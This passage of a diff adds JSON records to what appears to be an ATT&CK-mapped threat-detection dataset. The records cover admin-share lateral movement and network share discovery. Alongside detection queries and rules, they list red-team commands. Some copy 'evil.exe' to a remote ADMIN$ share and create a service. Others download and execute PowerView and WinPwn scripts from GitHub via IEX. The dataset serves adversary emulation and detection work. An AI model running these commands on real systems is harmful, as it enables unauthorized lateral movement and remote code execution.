"host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.youtube.com/watch?v=fevGZs0EQu8", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1077", + "command_list": [ + "net use [\\\\ip\\path] [password] [/user:DOMAIN\\user]\nnet use \\\\COMP\\ADMIN$ password /user:COMP\\Administrator (checking password reuse on local admin account)", + "shell net use [\\\\ip\\path] [password] [/user:DOMAIN\\user]", + "Creating a new service remotely:\nnet use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\ncopy evil.exe \\\\COMP\\ADMIN$\\System32\\acachsrv.exe\nsc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto DisplayName= \"DisplayName\"\nsc \\\\COMP start acachsrv", + "Creating a new service remotely:\nshell net use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\nshell copy evil.exe \\\\COMP\\ADMIN$\\acachsrv.exe\nshell sc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto description= \"Description here\" DisplayName= \"DisplayName\"\nshell sc \\\\COMP start acachsrv" + ], + "commands": [ + { + "command": "net use [\\\\ip\\path] [password] [/user:DOMAIN\\user]\nnet use \\\\COMP\\ADMIN$ password /user:COMP\\Administrator (checking password reuse on local admin account)", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell net use [\\\\ip\\path] [password] [/user:DOMAIN\\user]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "Creating a new service remotely:\nnet use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\ncopy evil.exe \\\\COMP\\ADMIN$\\System32\\acachsrv.exe\nsc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto DisplayName= \"DisplayName\"\nsc \\\\COMP start acachsrv", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "Creating a new service remotely:\nshell net use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\nshell copy evil.exe \\\\COMP\\ADMIN$\\acachsrv.exe\nshell sc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto description= \"Description here\" DisplayName= \"DisplayName\"\nshell sc \\\\COMP start acachsrv", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + } + ], + "parsed_datasets": [ + { + "Category": "T1077", + "Built-in Windows Command": "net use [\\\\ip\\path] [password] [/user:DOMAIN\\user]\nnet use \\\\COMP\\ADMIN$ password /user:COMP\\Administrator (checking password reuse on local admin account)", + "Cobalt Strike": "shell net use [\\\\ip\\path] [password] [/user:DOMAIN\\user]", + "Metasploit": "", + "Description": "Used to view network shared resource information, add a new network resource, and remove an old network resource from the computer. Run this against computers discovered from the previous two commands to view the shares that are available on them." + }, + { + "Category": "T1077", + "Built-in Windows Command": "Creating a new service remotely:\nnet use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\ncopy evil.exe \\\\COMP\\ADMIN$\\System32\\acachsrv.exe\nsc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto DisplayName= \"DisplayName\"\nsc \\\\COMP start acachsrv", + "Cobalt Strike": "Creating a new service remotely:\nshell net use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\nshell copy evil.exe \\\\COMP\\ADMIN$\\acachsrv.exe\nshell sc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto description= \"Description here\" DisplayName= \"DisplayName\"\nshell sc \\\\COMP start acachsrv", + "Metasploit": "", + "Description": "This technique creates a new service on the remote machine. It's important to note the spaces after the = in these commands! Also, before starting the service, run the following commands to make sure everything is set up properly:\nsc \\\\COMP qc acachsrv\ndir \\\\COMP\\ADMIN$\\acachsrv.exe" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3 and process_path contains \"net.exe\"and (process_command_line contains \"use\"or process_command_line contains \"session\"or process_command_line contains \"file\")", + "name": "Windows Admin Shares" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"net.exe\"or process_path contains \"powershell.exe\")and ((process_command_line contains \"*net* use*$\"or process_command_line contains \"*net* session*$\"or process_command_line contains \"*net* file*$\")or process_command_line contains \"*New-PSDrive*root*\")", + "name": "Windows Admin Shares Process" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and process_path contains \"net.exe\"and process_command_line contains \"net share\"", + "name": "Windows Admin Shares Process Created" + } + ], + "possible_detections": [ + { + "title": "Access to ADMIN$ Share", + "id": "098d7118-55bc-4912-a836-dc6483a8d150", + "description": "Detects access to $ADMIN share", + "tags": [ + "attack.lateral_movement", + "attack.t1077" + ], + "status": "experimental", + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "security", + "definition": "The advanced audit policy setting \"Object Access > Audit File Share\" must be configured for Success/Failure" + }, + "detection": { + "selection": { + "EventID": 5140, + "ShareName": "Admin$" + }, + "filter": { + "SubjectUserName": "*$" + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Legitimate administrative activity" + ], + "level": "low" + }, + { + "title": "First time seen remote named pipe", + "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "author": "Samir Bousseaden", + "references": [ + "https://twitter.com/menasec1/status/1104489274387451904" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1077" + ], + "logsource": { + "product": "windows", + "service": "security", + "description": "The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure" + }, + "detection": { + "selection1": { + "EventID": 5145, + "ShareName": "\\\\*\\IPC$" + }, + "selection2": { + "EventID": 5145, + "ShareName": "\\\\*\\IPC$", + "RelativeTargetName": [ + "atsvc", + "samr", + "lsarpc", + "winreg", + "netlogon", + "srvsvc", + "protected_storage", + "wkssvc", + "browser", + "netdfs" + ] + }, + "condition": "selection1 and not selection2" + }, + "falsepositives": [ + "update the excluded named pipe to filter out any newly observed legit named pipe" + ], + "level": "high" + }, + { + "title": "Suspicious PsExec execution", + "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "author": "Samir Bousseaden", + "references": [ + "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1077" + ], + "logsource": { + "product": "windows", + "service": "security", + "description": "The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure" + }, + "detection": { + "selection1": { + "EventID": 5145, + "ShareName": "\\\\*\\IPC$", + "RelativeTargetName": [ + "*-stdin", + "*-stdout", + "*-stderr" + ] + }, + "selection2": { + "EventID": 5145, + "ShareName": "\\\\*\\IPC$", + "RelativeTargetName": "PSEXESVC*" + }, + "condition": "selection1 and not selection2" + }, + "falsepositives": [ + "nothing observed so far" + ], + "level": "high" + }, + [ + "5156", + "Windows Firewall" + ], + [ + "4624", + "Authentication logs" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4624", + "Authentication logs" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ] + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "http://www.secureworks.com/resources/blog/living-off-the-land/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + ] + }, + { + "technique_id": "T1135", + "command_list": [ + "net share", + "auxiliary/scanner/smb/smb_enumshares", + "net view \\\\host /all [/domain:domain]", + "net view \\\\host /domain", + "df -aH\nsmbutil view -g //computer1\nshowmount computer1\n", + "smbstatus --shares\n", + "net view \\\\localhost\n", + "get-smbshare\n", + "net share\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose\n", + "Import-Module $env:TEMP\\PowerView.ps1\nInvoke-ShareFinder -CheckShareAccess\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nshareenumeration -noninteractive -consoleoutput", + "Get-SmbShare | ConvertTo-Json", + "net view \\\\#{remote.host.fqdn} /all", + "powershell/situational_awareness/network/powerview/get_dfs_share", + "powershell/situational_awareness/network/powerview/share_finder", + "python/situational_awareness/network/active_directory/get_fileservers", + "python/situational_awareness/network/smb_mount" + ], + "commands": [ + { + "command": "net share", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "net share", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "auxiliary/scanner/smb/smb_enumshares", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "net view \\\\host /all [/domain:domain]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "net view \\\\host /domain", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "df -aH\nsmbutil view -g //computer1\nshowmount computer1\n", + "source": "atomics/T1135/T1135.yaml", + "name": "Atomic Red Team Test - Network Share Discovery" + }, + { + "command": "smbstatus --shares\n", + "source": "atomics/T1135/T1135.yaml", + "name": "Atomic Red Team Test - Network Share Discovery" + }, + { + "command": "net view \\\\localhost\n", + "source": "atomics/T1135/T1135.yaml", + "name": "Atomic Red Team Test - Network Share Discovery" + }, + { + "command": "get-smbshare\n", + "source": "atomics/T1135/T1135.yaml", + "name": "Atomic Red Team Test - Network Share Discovery" + }, + { + "command": "net share\n", + "source": "atomics/T1135/T1135.yaml", + "name": "Atomic Red Team Test - Network Share Discovery" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose\n", + "source": "atomics/T1135/T1135.yaml", + "name": "Atomic Red Team Test - Network Share Discovery" + }, + { + "command": "Import-Module $env:TEMP\\PowerView.ps1\nInvoke-ShareFinder -CheckShareAccess\n", + "source": "atomics/T1135/T1135.yaml", + "name": "Atomic Red Team Test - Network Share Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nshareenumeration -noninteractive -consoleoutput", + "source": "atomics/T1135/T1135.yaml", + "name": "Atomic Red Team Test - Network Share Discovery" + }, + { + "command": "Get-SmbShare | ConvertTo-Json", + "source": "data/abilities/discovery/530e47c6-8592-42bf-91df-c59ffbd8541b.yml", + "name": "Network Share Discovery" + }, + { + "command": "net view \\\\#{remote.host.fqdn} /all", + "source": "data/abilities/discovery/deeac480-5c2a-42b5-90bb-41675ee53c7e.yml", + "name": "View the shares of a remote host" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_dfs_share", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/share_finder", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/get_fileservers", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/smb_mount", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1135", + "Built-in Windows Command": "net share", + "Cobalt Strike": "net share", + "Metasploit": "auxiliary/scanner/smb/smb_enumshares", + "Description": "Used to view network shared resource information, share a new network resource, and remove an old shared network resource from the workstation. Not for remote queries" + }, + { + "Category": "T1135", + "Built-in Windows Command": "net view \\\\host /all [/domain:domain]", + "Cobalt Strike": "net view \\\\host /domain", + "Metasploit": "auxiliary/scanner/smb/smb_enumshares", + "Description": "Display the list of workstations and network devices on the network. " + }, + { + "attack_technique": "T1135", + "display_name": "Network Share Discovery", + "atomic_tests": [ + { + "name": "Network Share Discovery", + "auto_generated_guid": "f94b5ad9-911c-4eff-9718-fd21899db4f7", + "description": "Network Share Discovery\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "computer_name": { + "description": "Computer name to find a mount on.", + "type": "String", + "default": "computer1" + } + }, + "executor": { + "command": "df -aH\nsmbutil view -g //#{computer_name}\nshowmount #{computer_name}\n", + "name": "sh" + } + }, + { + "name": "Network Share Discovery - linux", + "auto_generated_guid": "875805bc-9e86-4e87-be86-3a5527315cae", + "description": "Network Share Discovery using smbstatus\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "package_checker": { + "description": "Package checking command. Debian - dpkg -s samba", + "type": "String", + "default": "(rpm -q samba &>/dev/null) || (dpkg -s samba | grep -q installed)" + }, + "package_installer": { + "description": "Package installer command. Debian - apt install samba", + "type": "String", + "default": "(which yum && yum -y install epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba)" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Package with smbstatus (samba) must exist on device\n", + "prereq_command": "if #{package_checker} > /dev/null; then exit 0; else exit 1; fi\n", + "get_prereq_command": "sudo #{package_installer} \n" + } + ], + "executor": { + "command": "smbstatus --shares\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Network Share Discovery command prompt", + "auto_generated_guid": "20f1097d-81c1-405c-8380-32174d493bbb", + "description": "Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host\nUpon execution avalaible network shares will be displayed in the powershell session\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "computer_name": { + "description": "Computer name to find a mount on.", + "type": "String", + "default": "localhost" + } + }, + "executor": { + "command": "net view \\\\#{computer_name}\n", + "name": "command_prompt" + } + }, + { + "name": "Network Share Discovery PowerShell", + "auto_generated_guid": "1b0814d1-bb24-402d-9615-1b20c50733fb", + "description": "Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host\nUpon execution, avalaible network shares will be displayed in the powershell session\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "get-smbshare\n", + "name": "powershell" + } + }, + { + "name": "View available share drives", + "auto_generated_guid": "ab39a04f-0c93-4540-9ff2-83f862c385ae", + "description": "View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net share\n", + "name": "command_prompt" + } + }, + { + "name": "Share Discovery with PowerView", + "auto_generated_guid": "b1636f0a-ba82-435c-b699-0d78794d8bfd", + "description": "Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be 